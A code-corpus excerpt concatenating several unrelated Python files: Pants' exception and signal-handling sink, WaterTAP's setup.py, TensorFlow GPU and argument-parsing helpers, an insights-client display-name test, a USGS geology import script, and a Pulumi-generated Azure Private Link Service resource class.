When waiting on a subprocess and in a signal handler, sys.exit appears to be ignored, and causes
the signal handler to return. We want to (eventually) exit after these signals, not ignore them,
so we raise this exception instead and check it in our sys.excepthook override.
"""
def __init__(self, signum, signame):
self.signum = signum
self.signame = signame
self.traceback_lines = traceback.format_stack()
super(SignalHandler.SignalHandledNonLocalExit, self).__init__()
def handle_sigquit(self, signum, _frame):
raise self.SignalHandledNonLocalExit(signum, 'SIGQUIT')
def handle_sigterm(self, signum, _frame):
raise self.SignalHandledNonLocalExit(signum, 'SIGTERM')
class ExceptionSink:
"""A mutable singleton object representing where exceptions should be logged to."""
# NB: see the bottom of this file where we call reset_log_location() and other mutators in order
# to properly setup global state.
_log_dir = None
# We need an exiter in order to know what to do after we log a fatal exception or handle a
# catchable signal.
_exiter = None
# Where to log stacktraces to in a SIGUSR2 handler.
_interactive_output_stream = None
# Whether to print a stacktrace in any fatal error message printed to the terminal.
_should_print_backtrace_to_terminal = True
# An instance of `SignalHandler` which is invoked to handle a static set of specific
# nonfatal signals (these signal handlers are allowed to make pants exit, but unlike SIGSEGV they
# don't need to exit immediately).
_signal_handler = None
# These persistent open file descriptors are kept so the signal handler can do almost no work
# (and lets faulthandler figure out signal safety).
_pid_specific_error_fileobj = None
_shared_error_fileobj = None
def __new__(cls, *args, **kwargs):
raise TypeError('Instances of {} are not allowed to be constructed!'
.format(cls.__name__))
class ExceptionSinkError(Exception): pass
@classmethod
def reset_should_print_backtrace_to_terminal(cls, should_print_backtrace):
"""Set whether a backtrace gets printed to the terminal error stream on a fatal error.
Class state:
- Overwrites `cls._should_print_backtrace_to_terminal`.
"""
cls._should_print_backtrace_to_terminal = should_print_backtrace
# All reset_* methods are ~idempotent!
@classmethod
def reset_log_location(cls, new_log_location):
"""Re-acquire file handles to error logs based in the new location.
Class state:
- Overwrites `cls._log_dir`, `cls._pid_specific_error_fileobj`, and
`cls._shared_error_fileobj`.
OS state:
- May create a new directory.
- Overwrites signal handlers for many fatal and non-fatal signals (but not SIGUSR2).
:raises: :class:`ExceptionSink.ExceptionSinkError` if the directory does not exist or is not
writable.
"""
# We could no-op here if the log locations are the same, but there's no reason not to have the
# additional safety of re-acquiring file descriptors each time (and erroring out early if the
# location is no longer writable).
# Create the directory if possible, or raise if not writable.
cls._check_or_create_new_destination(new_log_location)
pid_specific_error_stream, shared_error_stream = cls._recapture_fatal_error_log_streams(
new_log_location)
# NB: mutate process-global state!
if faulthandler.is_enabled():
logger.debug('re-enabling faulthandler')
# Call Py_CLEAR() on the previous error stream:
# https://github.com/vstinner/faulthandler/blob/master/faulthandler.c
faulthandler.disable()
# Send a stacktrace to this file if interrupted by a fatal error.
faulthandler.enable(file=pid_specific_error_stream, all_threads=True)
# NB: mutate the class variables!
cls._log_dir = new_log_location
cls._pid_specific_error_fileobj = pid_specific_error_stream
cls._shared_error_fileobj = shared_error_stream
class AccessGlobalExiterMixin:
@property
def _exiter(self) -> Exiter:
return ExceptionSink.get_global_exiter()
@classmethod
def get_global_exiter(cls) -> Exiter:
return cls._exiter
@classmethod
@contextmanager
def exiter_as(cls, new_exiter_fun: Callable[[Exiter], Exiter]) -> None:
"""Temporarily override the global exiter.
NB: We don't want to try/finally here, because we want exceptions to propagate
with the most recent exiter installed in sys.excepthook.
If we wrap this in a try:finally, exceptions will be caught and exiters unset.
"""
previous_exiter = cls._exiter
new_exiter = new_exiter_fun(previous_exiter)
cls._reset_exiter(new_exiter)
yield
cls._reset_exiter(previous_exiter)
@classmethod
@contextmanager
def exiter_as_until_exception(cls, new_exiter_fun: Callable[[Exiter], Exiter]) -> None:
"""Temporarily override the global exiter, except this will unset it when an exception happens."""
previous_exiter = cls._exiter
new_exiter = new_exiter_fun(previous_exiter)
try:
cls._reset_exiter(new_exiter)
yield
finally:
cls._reset_exiter(previous_exiter)
@classmethod
def _reset_exiter(cls, exiter: Exiter) -> None:
"""
Class state:
- Overwrites `cls._exiter`.
Python state:
- Overwrites sys.excepthook.
"""
assert(isinstance(exiter, Exiter))
logger.debug(f"overriding the global exiter with {exiter} (from {cls._exiter})")
# NB: mutate the class variables! This is done before mutating the exception hook, because the
# uncaught exception handler uses cls._exiter to exit.
cls._exiter = exiter
# NB: mutate process-global state!
sys.excepthook = cls._log_unhandled_exception_and_exit
@classmethod
def reset_interactive_output_stream(
cls,
interactive_output_stream,
override_faulthandler_destination=True
):
"""
Class state:
- Overwrites `cls._interactive_output_stream`.
OS state:
- Overwrites the SIGUSR2 handler.
This method registers a SIGUSR2 handler, which permits a non-fatal `kill -31 <pants pid>` for
stacktrace retrieval. This is also where the the error message on fatal exit will be printed to.
"""
try:
# NB: mutate process-global state!
# This permits a non-fatal `kill -31 <pants pid>` for stacktrace retrieval.
if override_faulthandler_destination:
faulthandler.register(signal.SIGUSR2, interactive_output_stream,
all_threads=True, chain=False)
# NB: mutate the class variables!
cls._interactive_output_stream = interactive_output_stream
except ValueError:
# Warn about "ValueError: IO on closed file" when the stream is closed.
cls.log_exception(
"Cannot reset interactive_output_stream -- stream (probably stderr) is closed")
@classmethod
def exceptions_log_path(cls, for_pid=None, in_dir=None):
"""Get the path to either the shared or pid-specific fatal errors log file."""
if for_pid is None:
intermediate_filename_component = ''
else:
assert(isinstance(for_pid, Pid))
intermediate_filename_component = '.{}'.format(for_pid)
in_dir = in_dir or cls._log_dir
return os.path.join(
in_dir,
'logs',
'exceptions{}.log'.format(intermediate_filename_component))
@classmethod
def log_exception(cls, msg):
"""Try to log an error message to this process's error log and the shared error log.
NB: Doesn't raise (logs an error instead).
"""
pid = os.getpid()
fatal_error_log_entry = cls._format_exception_message(msg, pid)
# We care more about this log than the shared log, so write to it first.
try:
cls._try_write_with_flush(cls._pid_specific_error_fileobj, fatal_error_log_entry)
except Exception as e:
logger.error(
"Error logging the message '{}' to the pid-specific file handle for {} at pid {}:\n{}"
.format(msg, cls._log_dir, pid, e))
# Write to the shared log.
try:
# TODO: we should probably guard this against concurrent modification by other pants
# subprocesses somehow.
cls._try_write_with_flush(cls._shared_error_fileobj, fatal_error_log_entry)
except Exception as e:
logger.error(
"Error logging the message '{}' to the shared file handle for {} at pid {}:\n{}"
.format(msg, cls._log_dir, pid, e))
@classmethod
def _try_write_with_flush(cls, fileobj, payload):
"""This method is here so that it can be patched to simulate write errors.
This is because mock can't patch primitive objects like file objects.
"""
fileobj.write(payload)
fileobj.flush()
@classmethod
def _check_or_create_new_destination(cls, destination):
try:
safe_mkdir(destination)
except Exception as e:
raise cls.ExceptionSinkError(
"The provided exception sink path at '{}' is not writable or could not be created: {}."
.format(destination, str(e)),
e)
@classmethod
def _recapture_fatal_error_log_streams(cls, new_log_location):
# NB: We do not close old file descriptors under the assumption their lifetimes are managed
# elsewhere.
# We recapture both log streams each time.
pid = os.getpid()
pid_specific_log_path = cls.exceptions_log_path(for_pid=pid, in_dir=new_log_location)
shared_log_path = cls.exceptions_log_path(in_dir=new_log_location)
assert(pid_specific_log_path != shared_log_path)
try:
# Truncate the pid-specific error log file.
pid_specific_error_stream = safe_open(pid_specific_log_path, mode='w')
# Append to the shared error file.
shared_error_stream = safe_open(shared_log_path, mode='a')
except Exception as e:
raise cls.ExceptionSinkError(
"Error opening fatal error log streams for log location '{}': {}"
.format(new_log_location, str(e)))
return (pid_specific_error_stream, shared_error_stream)
@classmethod
def reset_signal_handler(cls, signal_handler):
"""
Class state:
- Overwrites `cls._signal_handler`.
OS state:
- Overwrites signal handlers for SIGINT, SIGQUIT, and SIGTERM.
NB: This method calls signal.signal(), which will crash if not called from the main thread!
:returns: The :class:`SignalHandler` that was previously registered, or None if this is
the first time this method was called.
"""
assert(isinstance(signal_handler, SignalHandler))
# NB: Modify process-global state!
for signum, handler in signal_handler.signal_handler_mapping.items():
signal.signal(signum, handler)
# Retry any system calls interrupted by any of the signals we just installed handlers for
# (instead of having them raise EINTR). siginterrupt(3) says this is the default behavior on
# Linux and OSX.
signal.siginterrupt(signum, False)
previous_signal_handler = cls._signal_handler
# NB: Mutate the class variables!
cls._signal_handler = signal_handler
return previous_signal_handler
@classmethod
@contextmanager
def trapped_signals(cls, new_signal_handler):
"""
A contextmanager which temporarily overrides signal handling.
NB: This method calls signal.signal(), which will crash if not called from the main thread!
"""
previous_signal_handler = cls.reset_signal_handler(new_signal_handler)
try:
yield
finally:
cls.reset_signal_handler(previous_signal_handler)
@classmethod
@contextmanager
def ignoring_sigint(cls):
"""
A contextmanager which disables handling sigint in the current signal handler.
This allows threads that are not the main thread to ignore sigint.
NB: Only use this if you can't use ExceptionSink.trapped_signals().
Class state:
- Toggles `self._ignore_sigint` in `cls._signal_handler`.
"""
with cls._signal_handler._ignoring_sigint():
yield
@classmethod
def _iso_timestamp_for_now(cls):
return datetime.datetime.now().isoformat()
# NB: This includes a trailing newline, but no leading newline.
_EXCEPTION_LOG_FORMAT = """\
timestamp: {timestamp}
process title: {process_title}
sys.argv: {args}
pid: {pid}
{message}
"""
@classmethod
def _format_exception_message(cls, msg, pid):
return cls._EXCEPTION_LOG_FORMAT.format(
timestamp=cls._iso_timestamp_for_now(),
process_title=setproctitle.getproctitle(),
args=sys.argv,
pid=pid,
message=msg)
_traceback_omitted_default_text = '(backtrace omitted)'
@classmethod
def _format_traceback(cls, traceback_lines, should_print_backtrace):
if should_print_backtrace:
traceback_string = '\n{}'.format(''.join(traceback_lines))
else:
traceback_string = ' {}'.format(cls._traceback_omitted_default_text)
return traceback_string
_UNHANDLED_EXCEPTION_LOG_FORMAT = """\
Exception caught: ({exception_type}){backtrace}
Exception message: {exception_message}{maybe_newline}
"""
@classmethod
def _format_unhandled_exception_log(cls, exc, tb, add_newline, should_print_backtrace):
exc_type = type(exc)
exception_full_name = '{}.{}'.format(exc_type.__module__, exc_type.__name__)
exception_message = str(exc) if exc else '(no message)'
maybe_newline = '\n' if add_newline else ''
return cls._UNHANDLED_EXCEPTION_LOG_FORMAT.format(
exception_type=exception_full_name,
backtrace=cls._format_traceback(traceback_lines=traceback.format_tb(tb),
should_print_backtrace=should_print_backtrace),
exception_message=exception_message,
maybe_newline=maybe_newline)
_EXIT_FAILURE_TERMINAL_MESSAGE_FORMAT = """\
{timestamp_msg}{terminal_msg}{details_msg}
"""
@classmethod
def _exit_with_failure(cls, terminal_msg):
timestamp_msg = (f'timestamp: {cls._iso_timestamp_for_now()}\n'
if cls._should_print_backtrace_to_terminal else '')
details_msg = ('' if cls._should_print_backtrace_to_terminal
else '\n\n(Use --print-exception-stacktrace to see more error details.)')
terminal_msg = terminal_msg or '<no exit reason provided>'
formatted_terminal_msg = cls._EXIT_FAILURE_TERMINAL_MESSAGE_FORMAT.format(
timestamp_msg=timestamp_msg, terminal_msg=terminal_msg, details_msg=details_msg)
# Exit with failure, printing a message to the terminal (or whatever the interactive stream is).
cls._exiter.exit_and_fail(msg=formatted_terminal_msg, out=cls._interactive_output_stream)
@classmethod
def _log_unhandled_exception_and_exit(cls, exc_class=None, exc=None, tb=None, add_newline=False):
"""A sys.excepthook implementation which logs the error and exits with failure."""
exc_class = exc_class or sys.exc_info()[0]
exc = exc or sys.exc_info()[1]
tb = tb or sys.exc_info()[2]
# This exception was raised by a signal handler with the intent to exit the program.
if exc_class == SignalHandler.SignalHandledNonLocalExit:
return cls._handle_signal_gracefully(exc.signum, exc.signame, exc.traceback_lines)
extra_err_msg = None
try:
# Always output the unhandled exception details into a log file, including the traceback.
exception_log_entry = cls._format_unhandled_exception_log(exc, tb, add_newline,
should_print_backtrace=True)
cls.log_exception(exception_log_entry)
except Exception as e:
extra_err_msg = 'Additional error logging unhandled exception {}: {}'.format(exc, e)
logger.error(extra_err_msg)
# Generate an unhandled exception report fit to be printed to the terminal (respecting the
# Exiter's should_print_backtrace field).
if cls._should_print_backtrace_to_terminal:
stderr_printed_error = cls._format_unhandled_exception_log(
exc, tb, add_newline,
should_print_backtrace=cls._should_print_backtrace_to_terminal)
if extra_err_msg:
stderr_printed_error = '{}\n{}'.format(stderr_printed_error, extra_err_msg)
else:
# If the user didn't ask for a backtrace, show a succinct error message without
# all the exception-related preamble. A power-user/pants developer can still
# get all the preamble info along with the backtrace, but the end user shouldn't
# see that boilerplate by default.
error_msgs = getattr(exc, 'end_user_messages', lambda: [str(exc)])()
stderr_printed_error = '\n' + '\n'.join(f'ERROR: {msg}' for msg in error_msgs)
cls._exit_with_failure(stderr_printed_error)
_CATCHABLE_SIGNAL_ERROR_LOG_FORMAT = """\
Signal {signum} ({signame}) was raised. Exiting with failure.{formatted_traceback}
"""
@classmethod
def _handle_signal_gracefully(cls, signum, signame, traceback_lines):
"""Signal handler for non-fatal signals which raises or logs an error and exits with failure."""
# Extract the stack, and format an entry to be written to the exception log.
formatted_traceback = cls._format_traceback(traceback_lines=traceback_lines,
should_print_backtrace=True)
signal_error_log_entry = cls._CATCHABLE_SIGNAL_ERROR_LOG_FORMAT.format(
signum=signum,
signame=signame,
formatted_traceback=formatted_traceback)
# TODO: determine the appropriate signal-safe behavior here (to avoid writing to our file
# descriptors re-entrantly, which raises an IOError).
# This method catches any exceptions raised within it.
cls.log_exception(signal_error_log_entry)
# Create a potentially-abbreviated traceback for the terminal or other interactive stream.
formatted_traceback_for_terminal = cls._format_traceback(
traceback_lines=traceback_lines,
should_print_backtrace=cls._should_print_backtrace_to_terminal)
terminal_log_entry = cls._CATCHABLE_SIGNAL_ERROR_LOG_FORMAT.format(
signum=signum,
signame=signame,
formatted_traceback=formatted_traceback_for_terminal)
# Exit, printing the output to the terminal.
cls._exit_with_failure(terminal_log_entry)
# Setup global state such as signal handlers and sys.excepthook with probably-safe values at module
# import time.
# Set the log location for writing logs before bootstrap options are parsed.
ExceptionSink.reset_log_location(os.getcwd())
# Sets except hook for exceptions at import time.
ExceptionSink._reset_exiter(Exiter(exiter=sys.exit))
# Sets a SIGUSR2 handler.
ExceptionSink.reset_interactive_output_stream(sys.stderr.buffer)
# Sets a handler that logs nonfatal signals to the exception sink before exiting.
ExceptionSink.reset_signal_handler(SignalHandler())
# Set whether to print stacktraces on exceptions or signals during import time.
# NB: This will be overridden by bootstrap options in PantsRunner, so we avoid printing out a full
# stacktrace when a user presses control-c during import time unless the environment variable is set
# to explicitly request it. The exception log will have any stacktraces regardless so this should
# not hamper debugging.
ExceptionSink.reset_should_print_backtrace_to_terminal(
should_print_backtrace=os.environ.get('PANTS_PRINT_EXCEPTION_STACKTRACE', 'True') == 'True')
| 40.305302 | 102 | 0.733796 |
4a1b3a94b52bc276ac1b6b5cf2e3c2d0cdc87115
| 6,032 |
py
|
Python
|
setup.py
|
luohezhiming/chenyu
|
227d67a56bfacb85210ad07d6f44e84a8b0d2ea1
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
setup.py
|
luohezhiming/chenyu
|
227d67a56bfacb85210ad07d6f44e84a8b0d2ea1
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
setup.py
|
luohezhiming/chenyu
|
227d67a56bfacb85210ad07d6f44e84a8b0d2ea1
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
###############################################################################
# WaterTAP Copyright (c) 2021, The Regents of the University of California,
# through Lawrence Berkeley National Laboratory, Oak Ridge National
# Laboratory, National Renewable Energy Laboratory, and National Energy
# Technology Laboratory (subject to receipt of any required approvals from
# the U.S. Dept. of Energy). All rights reserved.
#
# Please see the files COPYRIGHT.md and LICENSE.md for full copyright and license
# information, respectively. These files are also available online at the URL
# "https://github.com/watertap-org/watertap/"
#
###############################################################################
"""
Project setup with setuptools
"""
# Always prefer setuptools over distutils
from setuptools import setup, find_namespace_packages
import pathlib
cwd = pathlib.Path(__file__).parent.resolve() # this will come in handy, probably
long_description = """WaterTAP is an open-source, integrated suite of predictive multi-scale models
for design and optimization of water treatment processes and systems. Specifically, WaterTAP is a new
library of water treatment-specific property, process unit, and network models that depend on the IDAES Platform,
an open source, next generation process systems engineering platform developed at the National Energy Technology
Laboratory with other partners. The WaterTAP project is funded by the NAWI as a part of U.S. Department of
Energy’s Energy-Water Desalination Hub. The goal of WaterTAP is to assist the hub and the broader water R&D
community in assessing existing and emerging water treatment technologies by 1) providing predictive capabilities
involving the design, optimization, and performance of water treatment systems that will lead to improved energy
efficiency and lower cost, 2) advancing the state of the art for the design of water treatment components, systems
and networks to be comparable with, or even surpass, that in the chemical industry, and 3) disseminating these tools
for active use by water treatment researchers and engineers.""".replace(
"\n", " "
).strip()
SPECIAL_DEPENDENCIES_FOR_RELEASE = [
"idaes-pse>=1.12.0", # from PyPI
]
SPECIAL_DEPENDENCIES_FOR_PRERELEASE = [
# update with a tag from the nawi-hub/idaes-pse
# when a version of IDAES newer than the latest stable release from PyPI
# will become needed for the watertap development
"idaes-pse[prerelease] @ https://github.com/watertap-org/idaes-pse/archive/1.12.1.watertap.2022.02.04.zip",
]
# Arguments marked as "Required" below must be included for upload to PyPI.
# Fields marked as "Optional" may be commented out.
setup(
name="watertap",
url="https://github.com/watertap-org/watertap",
version="0.4.0dev",
description="WaterTAP modeling library",
long_description=long_description,
long_description_content_type="text/plain",
author="NAWI team",
license="BSD",
# Classifiers help users find your project by categorizing it.
#
# For a list of valid classifiers, see https://pypi.org/classifiers/
classifiers=[
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
"Development Status :: 3 - Alpha",
"Intended Audience :: End Users/Desktop",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: BSD License",
"Natural Language :: English",
"Operating System :: MacOS",
"Operating System :: Microsoft :: Windows",
"Operating System :: Unix",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: Implementation :: CPython",
"Topic :: Scientific/Engineering :: Mathematics",
"Topic :: Scientific/Engineering :: Chemistry",
"Topic :: Software Development :: Libraries :: Python Modules",
"Programming Language :: Python :: 3 :: Only",
],
keywords="water systems, chemical engineering, process modeling, filtration, desalination, nawi",
packages=find_namespace_packages(),
python_requires=">=3.7, <4",
install_requires=[
# primary requirements for unit and property models
# maintainers: switch to SPECIAL_DEPENDENCIES_FOR_RELEASE when cutting a release of watertap
*SPECIAL_DEPENDENCIES_FOR_PRERELEASE,
"pyomo>=6.2", # (also needed for units in electrolyte database (edb))
# the following requirements are for the electrolyte database (edb)
"pymongo>3", # database interface
"fastjsonschema", # schema validation
"click", # command-line tools with Click
# tutorial tests
"nbformat",
"scipy",
# https://www.python.org/dev/peps/pep-0508/#environment-markers
'pywin32==225 ; platform_system=="Windows" and python_version>="3.8"',
],
extras_require={
"testing": [
"pytest",
"json-schema-for-humans",
"mongomock",
],
"dev": [
"myst-parser", # markdown support for Sphinx
"nbsphinx", # jupyter notebook support for sphinx
"Sphinx", # docs
"sphinx_rtd_theme", # docs
# other requirements
"linkify-it-py",
"json-schema-for-humans", # pretty JSON schema in HTML
"black", # code formatting
# other requirements
"pytest", # test framework
"pytest-cov", # code coverage
"mongomock", # mongodb mocking for testing
],
},
package_data={ # Optional
"": [
"*.json",
"*.yaml",
"*.yml",
],
},
entry_points={
# add edb CLI commands
"console_scripts": [
"edb = watertap.edb.commands:command_base",
]
},
)
| 43.085714 | 116 | 0.650696 |
4a1b3ab2797d6fc32be7292d94b56d5917aa3dd7
| 1,189 |
py
|
Python
|
utils/scripts_utils.py
|
assansanogo/TransformerTTS
|
58a3ec05a12184d55ce99e069b2307bb3279433b
|
[
"MIT"
] | 894 |
2020-05-14T21:07:27.000Z
|
2022-03-30T10:19:27.000Z
|
utils/scripts_utils.py
|
assansanogo/TransformerTTS
|
58a3ec05a12184d55ce99e069b2307bb3279433b
|
[
"MIT"
] | 89 |
2020-05-15T12:27:45.000Z
|
2022-02-26T07:23:38.000Z
|
utils/scripts_utils.py
|
assansanogo/TransformerTTS
|
58a3ec05a12184d55ce99e069b2307bb3279433b
|
[
"MIT"
] | 184 |
2020-04-24T01:27:58.000Z
|
2022-03-31T07:54:22.000Z
|
import traceback
import argparse
import tensorflow as tf
def dynamic_memory_allocation():
gpus = tf.config.experimental.list_physical_devices('GPU')
if gpus:
try:
# Currently, memory growth needs to be the same across GPUs
for gpu in gpus:
tf.config.experimental.set_memory_growth(gpu, True)
logical_gpus = tf.config.experimental.list_logical_devices('GPU')
print(len(gpus), 'Physical GPUs,', len(logical_gpus), 'Logical GPUs')
except Exception:
traceback.print_exc()
def basic_train_parser():
parser = argparse.ArgumentParser()
parser.add_argument('--config', dest='config', type=str)
parser.add_argument('--reset_dir', dest='clear_dir', action='store_true',
help="deletes everything under this config's folder.")
parser.add_argument('--reset_logs', dest='clear_logs', action='store_true',
help="deletes logs under this config's folder.")
parser.add_argument('--reset_weights', dest='clear_weights', action='store_true',
help="deletes weights under this config's folder.")
return parser
| 39.633333 | 85 | 0.651808 |
4a1b3b556c5846821f6be866c0b42121374e43e0
| 1,653 |
py
|
Python
|
insights/tests/client/test_displayname.py
|
lhuett/insights-core
|
1c84eeffc037f85e2bbf60c9a302c83aa1a50cf8
|
[
"Apache-2.0"
] | 121 |
2017-05-30T20:23:25.000Z
|
2022-03-23T12:52:15.000Z
|
insights/tests/client/test_displayname.py
|
lhuett/insights-core
|
1c84eeffc037f85e2bbf60c9a302c83aa1a50cf8
|
[
"Apache-2.0"
] | 1,977 |
2017-05-26T14:36:03.000Z
|
2022-03-31T10:38:53.000Z
|
insights/tests/client/test_displayname.py
|
lhuett/insights-core
|
1c84eeffc037f85e2bbf60c9a302c83aa1a50cf8
|
[
"Apache-2.0"
] | 244 |
2017-05-30T20:22:57.000Z
|
2022-03-26T10:09:39.000Z
|
import pytest
from insights.client.config import InsightsConfig
from insights.client.connection import InsightsConnection
from mock.mock import patch
class MockSession(object):
def __init__(self):
self.status_code = None
self.text = None
self.content = '{"display_name": "test"}'
def get(self, url=None, timeout=None, headers=None, data=None):
return MockResponse(self.status_code, self.text, self.content)
def put(self, url=None, timeout=None, headers=None, data=None):
return MockResponse(self.status_code, self.text, None)
class MockResponse(object):
def __init__(self, expected_status, expected_text, expected_content):
self.status_code = expected_status
self.text = expected_text
self.content = expected_content
def mock_init_session(obj):
return MockSession()
def mock_get_proxies(obj):
return
@pytest.mark.skip(reason='No time to fix this for double-API calling')
@patch('insights.client.connection.InsightsConnection._init_session',
mock_init_session)
@patch('insights.client.connection.InsightsConnection.get_proxies',
mock_get_proxies)
@patch('insights.client.utilities.constants.machine_id_file',
'/tmp/machine-id')
def test_set_display_name():
conf = InsightsConfig()
c = InsightsConnection(conf)
c.session.status_code = 200
assert c.set_display_name('GO STICK YOUR HEAD IN A PIG')
c.session.status_code = 404
assert not c.set_display_name('GO STICK YOUR HEAD IN A PIG')
c.session.status_code = 500
c.session.text = 'oops'
assert not c.set_display_name('GO STICK YOUR HEAD IN A PIG')
| 31.788462 | 73 | 0.725348 |
4a1b3c8fddfd4b54a3438cb7b47bd7c0f5a0007d
| 384 |
py
|
Python
|
sources/of97_489/__init__.py
|
kueda/underfoot
|
b9d1a05fced70c494e582280c577bf5e16b73f77
|
[
"MIT"
] | 4 |
2018-10-12T18:48:55.000Z
|
2022-03-10T05:30:18.000Z
|
sources/of97_489/__init__.py
|
kueda/underfoot
|
b9d1a05fced70c494e582280c577bf5e16b73f77
|
[
"MIT"
] | 4 |
2020-07-16T09:44:48.000Z
|
2020-11-21T08:09:53.000Z
|
sources/of97_489/__init__.py
|
kueda/underfoot
|
b9d1a05fced70c494e582280c577bf5e16b73f77
|
[
"MIT"
] | null | null | null |
import util
import os
def run():
util.process_usgs_source(
base_path=os.path.realpath(__file__),
url="http://pubs.usgs.gov/of/1997/of97-489/sc-geol.e00.gz",
e00_path="sc-geol.e00",
srs=util.NAD27_UTM10_PROJ4,
metadata_csv_path=os.path.join(
os.path.dirname(os.path.realpath(__file__)),
"units.csv"
)
)
| 24 | 67 | 0.601563 |
4a1b3d3f15e8ae4b46da9f6af68c3e431ec35c9f
| 24,915 |
py
|
Python
|
sdk/python/pulumi_azure_native/network/v20210201/private_link_service.py
|
polivbr/pulumi-azure-native
|
09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_native/network/v20210201/private_link_service.py
|
polivbr/pulumi-azure-native
|
09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_native/network/v20210201/private_link_service.py
|
polivbr/pulumi-azure-native
|
09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
from ._enums import *
from ._inputs import *
__all__ = ['PrivateLinkServiceInitArgs', 'PrivateLinkService']
@pulumi.input_type
class PrivateLinkServiceInitArgs:
def __init__(__self__, *,
resource_group_name: pulumi.Input[str],
auto_approval: Optional[pulumi.Input['PrivateLinkServicePropertiesAutoApprovalArgs']] = None,
enable_proxy_protocol: Optional[pulumi.Input[bool]] = None,
extended_location: Optional[pulumi.Input['ExtendedLocationArgs']] = None,
fqdns: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
id: Optional[pulumi.Input[str]] = None,
ip_configurations: Optional[pulumi.Input[Sequence[pulumi.Input['PrivateLinkServiceIpConfigurationArgs']]]] = None,
load_balancer_frontend_ip_configurations: Optional[pulumi.Input[Sequence[pulumi.Input['FrontendIPConfigurationArgs']]]] = None,
location: Optional[pulumi.Input[str]] = None,
service_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
visibility: Optional[pulumi.Input['PrivateLinkServicePropertiesVisibilityArgs']] = None):
"""
The set of arguments for constructing a PrivateLinkService resource.
:param pulumi.Input[str] resource_group_name: The name of the resource group.
:param pulumi.Input['PrivateLinkServicePropertiesAutoApprovalArgs'] auto_approval: The auto-approval list of the private link service.
:param pulumi.Input[bool] enable_proxy_protocol: Whether the private link service is enabled for proxy protocol or not.
:param pulumi.Input['ExtendedLocationArgs'] extended_location: The extended location of the load balancer.
:param pulumi.Input[Sequence[pulumi.Input[str]]] fqdns: The list of Fqdn.
:param pulumi.Input[str] id: Resource ID.
:param pulumi.Input[Sequence[pulumi.Input['PrivateLinkServiceIpConfigurationArgs']]] ip_configurations: An array of private link service IP configurations.
:param pulumi.Input[Sequence[pulumi.Input['FrontendIPConfigurationArgs']]] load_balancer_frontend_ip_configurations: An array of references to the load balancer IP configurations.
:param pulumi.Input[str] location: Resource location.
:param pulumi.Input[str] service_name: The name of the private link service.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags.
:param pulumi.Input['PrivateLinkServicePropertiesVisibilityArgs'] visibility: The visibility list of the private link service.
"""
pulumi.set(__self__, "resource_group_name", resource_group_name)
if auto_approval is not None:
pulumi.set(__self__, "auto_approval", auto_approval)
if enable_proxy_protocol is not None:
pulumi.set(__self__, "enable_proxy_protocol", enable_proxy_protocol)
if extended_location is not None:
pulumi.set(__self__, "extended_location", extended_location)
if fqdns is not None:
pulumi.set(__self__, "fqdns", fqdns)
if id is not None:
pulumi.set(__self__, "id", id)
if ip_configurations is not None:
pulumi.set(__self__, "ip_configurations", ip_configurations)
if load_balancer_frontend_ip_configurations is not None:
pulumi.set(__self__, "load_balancer_frontend_ip_configurations", load_balancer_frontend_ip_configurations)
if location is not None:
pulumi.set(__self__, "location", location)
if service_name is not None:
pulumi.set(__self__, "service_name", service_name)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if visibility is not None:
pulumi.set(__self__, "visibility", visibility)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="autoApproval")
def auto_approval(self) -> Optional[pulumi.Input['PrivateLinkServicePropertiesAutoApprovalArgs']]:
"""
The auto-approval list of the private link service.
"""
return pulumi.get(self, "auto_approval")
@auto_approval.setter
def auto_approval(self, value: Optional[pulumi.Input['PrivateLinkServicePropertiesAutoApprovalArgs']]):
pulumi.set(self, "auto_approval", value)
@property
@pulumi.getter(name="enableProxyProtocol")
def enable_proxy_protocol(self) -> Optional[pulumi.Input[bool]]:
"""
Whether the private link service is enabled for proxy protocol or not.
"""
return pulumi.get(self, "enable_proxy_protocol")
@enable_proxy_protocol.setter
def enable_proxy_protocol(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_proxy_protocol", value)
@property
@pulumi.getter(name="extendedLocation")
def extended_location(self) -> Optional[pulumi.Input['ExtendedLocationArgs']]:
"""
The extended location of the load balancer.
"""
return pulumi.get(self, "extended_location")
@extended_location.setter
def extended_location(self, value: Optional[pulumi.Input['ExtendedLocationArgs']]):
pulumi.set(self, "extended_location", value)
@property
@pulumi.getter
def fqdns(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The list of Fqdn.
"""
return pulumi.get(self, "fqdns")
@fqdns.setter
def fqdns(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "fqdns", value)
@property
@pulumi.getter
def id(self) -> Optional[pulumi.Input[str]]:
"""
Resource ID.
"""
return pulumi.get(self, "id")
@id.setter
def id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "id", value)
@property
@pulumi.getter(name="ipConfigurations")
